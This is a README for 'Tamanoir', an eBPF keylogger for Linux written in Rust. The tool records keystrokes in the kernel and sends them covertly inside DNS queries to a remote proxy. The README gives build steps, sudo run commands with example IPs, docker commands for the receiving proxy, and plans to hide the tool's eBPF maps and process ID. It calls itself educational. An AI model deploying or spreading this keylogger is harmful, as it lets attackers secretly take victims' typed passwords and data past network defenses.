A large anteater of Central and South America, Myrmecophaga tridactyla
- Capture keystrokes and store them in a queue in the kernel.
- Intercept DNS requests and inject the captured keystroes in the DNS payload then redirect the request designated remote server acting as a DNS proxy.
- On the remote server, extract the keys from the DNS payload and send a valid DNS response.
- Intercept the response and modify its source address so the initial request will complete successfully.
You need a Linux based OS.
To build from source, make sure you have:
- bpf-linker installed.
- Rust installed with
nightlytoolchain.
cd tamanoir-ebpf
cargo build --release
cargo build --release
This will produce an executable file at target/release/tamanoir that you can copy to a directory in your $PATH
You can download the pre-built binaries from the release page
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <DNS proxy IP> \
--hijack-ip <locally configured DNS server IP> \
--layout <keyboard layout> \
--iface <network interface name>
for example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.75 \
--hijack-ip 8.8.8.8 \
--layout 0 \
--iface wlan0
Currenly, there are two supported keyboard layouts:
0 : qwerty (us)
1 : azerty (fr)
On a remote host, make sure you have docker installed.
cd proxy
docker build -t proxy .
Note
Make sure port 53 is available
docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy
- Automatic discovery of the configured local dns server
- Automatic discovery of the keyboard layout
- Rewrite the DNS proxy in Rust
- Make
Tamanoirstealth (hide used ebpf maps and programs, process pid ...)
Tamanoir is developed for educational purposes only
GPLv3
